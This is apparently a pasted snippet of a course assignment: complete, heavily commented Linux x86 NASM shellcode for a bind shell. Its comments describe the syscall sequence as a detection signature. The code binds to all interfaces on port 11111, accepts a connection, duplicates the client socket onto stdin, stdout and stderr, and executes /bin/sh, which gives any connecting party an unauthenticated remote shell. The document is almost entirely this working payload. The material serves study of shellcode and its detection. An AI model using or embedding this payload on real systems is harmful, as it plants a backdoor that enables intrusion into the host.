peterzig

ASM Socket

Dec 2nd, 2019
; This is a snippet of the original file in https://github.com/geyslan/SLAE/blob/master/1st.assignment/shell_bind_tcp.asm
;
; Linux/x86 (32-bit) bind-shell sample. NASM, Intel syntax, int 0x80 syscall ABI.
;
; Kernel-side view of what this process does, in order (the sequence a
; syscall tracer or a sensor hooking socketcall/dup2/execve sees from one
; process is the useful signature here, not any single instruction):
;   socketcall(SYS_SOCKET)                   -> listening fd
;   socketcall(SYS_SETSOCKOPT, SO_REUSEADDR)
;   socketcall(SYS_BIND)                     -> 0.0.0.0:11111
;   socketcall(SYS_LISTEN)
;   socketcall(SYS_ACCEPT)                   -> client fd (blocks until a peer connects)
;   dup2 x3                                  -> client fd over stdin/stdout/stderr
;   execve("/bin//sh", NULL, NULL)
;
; Register roles (i386 syscall ABI: eax carries the number in and the return
; value out; ebx/ecx/edx/esi/edi carry arguments and survive int 0x80):
;   eax  syscall number / return value
;   ebx  socketcall subcall number, later the direct first argument
;   ecx  pointer to the argument array built on the stack
;   edx  listening socket fd until accept(), then the client fd
; Nothing pushed below is ever popped and no return value is checked: a
; failing stage leaves -errno in eax and execution simply continues.

global _start

section .text

_start:

    ; syscalls (/usr/include/asm/unistd_32.h)
    ; socketcall numbers (/usr/include/linux/net.h)

    ; Creating the socket file descriptor
    ; int socket(int domain, int type, int protocol);
    ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)

    mov eax, 102        ; syscall 102 - socketcall
    mov ebx, 1          ; socketcall type (sys_socket 1)

    ; socket arguments (bits/socket.h, netinet/in.h)
    ; pushed last-to-first so that esp ends up pointing at args[0]
    push 0              ; IPPROTO_IP = 0 (int)
    push 1              ; SOCK_STREAM = 1 (int)
    push 2              ; AF_INET = 2 (int)

    mov ecx, esp        ; ptr to argument array

    int 0x80            ; kernel interrupt

    mov edx, eax        ; saving the returned socket file descriptor


    ; Avoiding a failed rebind when restarting before the kernel has released
    ; the previously opened socket address; many shellcodes skip this and
    ; leave the address reuse problem unhandled.
    ; NOTE(review): the original comment said SIGSEGV, but rebinding a port
    ; still in TIME_WAIT fails with -EADDRINUSE from bind(), not with a
    ; signal; since nothing checks return values, a failed bind would just
    ; fall through to listen()/accept() on an unbound socket.
    ; int setsockopt(int sockfd, int level, int optname, const void *optval, socklen_t optlen);
    ; setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &optval, 4)

    mov eax, 102        ; syscall 102 - socketcall
    mov ebx, 14         ; socketcall type (sys_setsockopt 14)

    ; optval only needs to point at a nonzero int. `push esp` stores the
    ; value esp had *before* the push, i.e. the address of the dword 4 just
    ; pushed, so optval -> 4 (nonzero, enables the option) and optlen = 4.
    push 4              ; optlen = sizeof(int); also serves as *optval
    push esp            ; optval - address of the 4 above
    push 2              ; SO_REUSEADDR = 2
    push 1              ; SOL_SOCKET = 1
    push edx            ; sockfd

    mov ecx, esp        ; ptr to argument array

    int 0x80            ; kernel interrupt


    ; Binding the socket to an address
    ; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
    ; bind(sockfd, [AF_INET, 11111, INADDR_ANY], 16)

    mov eax, 102        ; syscall 102 - socketcall
    mov ebx, 2          ; socketcall type (sys_bind 2)

    ; building the sockaddr_in struct (sys/socket.h, netinet/in.h and bits/sockaddr.h)
    ; Only the first 8 of the struct's 16 bytes are written here; the
    ; sin_zero padding is whatever already sits above on the stack (the
    ; setsockopt argument array), which the kernel does not interpret
    ; for AF_INET.
    push 0              ; INADDR_ANY = 0 (uint32_t) - listen on all interfaces
    push WORD 0x672b    ; sin_port: 11111 = 0x2b67; the little-endian push
                        ; stores bytes 2b 67, i.e. network byte order
    push WORD 2         ; AF_INET = 2 (unsigned short int)
    mov ecx, esp        ; struct pointer

    ; bind arguments (sys/socket.h)
    push 16             ; sockaddr struct size = sizeof(struct sockaddr) = 16 (socklen_t)
    push ecx            ; sockaddr_in struct pointer (struct sockaddr *)
    push edx            ; socket fd (int)

    mov ecx, esp        ; ptr to argument array (ecx reused; struct ptr is now on the stack)

    int 0x80            ; kernel interrupt


    ; Preparing to listen for the incoming connection (passive socket)
    ; int listen(int sockfd, int backlog);
    ; listen(sockfd, 0);

    mov eax, 102        ; syscall 102 - socketcall
    mov ebx, 4          ; socketcall type (sys_listen 4)

    ; listen arguments
    push 0              ; backlog (connection queue size)
    push edx            ; socket fd

    mov ecx, esp        ; ptr to argument array

    int 0x80            ; kernel interrupt


    ; Accepting the incoming connection - this call blocks until a peer
    ; connects to port 11111
    ; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
    ; accept(sockfd, NULL, NULL)

    mov eax, 102        ; syscall 102 - socketcall
    mov ebx, 5          ; socketcall type (sys_accept 5)

    ; accept arguments
    push 0              ; NULL - the peer address is not recorded
    push 0              ; NULL - no addrlen since addr is NULL
    push edx            ; socket fd

    mov ecx, esp        ; ptr to argument array

    int 0x80            ; kernel interrupt

    mov edx, eax        ; saving the returned socket fd (client);
                        ; the listening fd is no longer referenced


    ; Redirecting the 3 standard file descriptors (stdin, stdout, stderr)
    ; onto the client socket, so the shell started below talks to the peer
    ; int dup2(int oldfd, int newfd);
    ; dup2(clientfd, 0); dup2(clientfd, 1); dup2(clientfd, 2)

    mov eax, 63         ; syscall 63 - dup2
    mov ebx, edx        ; oldfd (client socket fd) - set once, ebx survives int 0x80
    mov ecx, 0          ; stdin file descriptor

    int 0x80            ; kernel interrupt

    mov eax, 63         ; eax was clobbered by the return value, reload it
    mov ecx, 1          ; stdout file descriptor

    int 0x80

    mov eax, 63
    mov ecx, 2          ; stderr file descriptor

    int 0x80


    ; Finally, using execve to replace the current process image with /bin/sh
    ; int execve(const char *filename, char *const argv[], char *const envp[]);
    ; execve("/bin//sh", NULL, NULL)

    mov eax, 11         ; execve syscall

    ; execve string argument: "/bin//sh" is 8 bytes, so it fits two dword
    ; pushes exactly; the doubled slash is path-equivalent to "/bin/sh"
    push 0              ; null terminator
    push 0x68732f2f     ; "//sh"
    push 0x6e69622f     ; "/bin"

    mov ebx, esp        ; ptr to "/bin//sh" string
    mov ecx, 0          ; null ptr to argv (Linux accepts argv == NULL, argc = 0)
    mov edx, 0          ; null ptr to envp

    int 0x80            ; does not return on success; on failure execution
                        ; falls off the end of the sample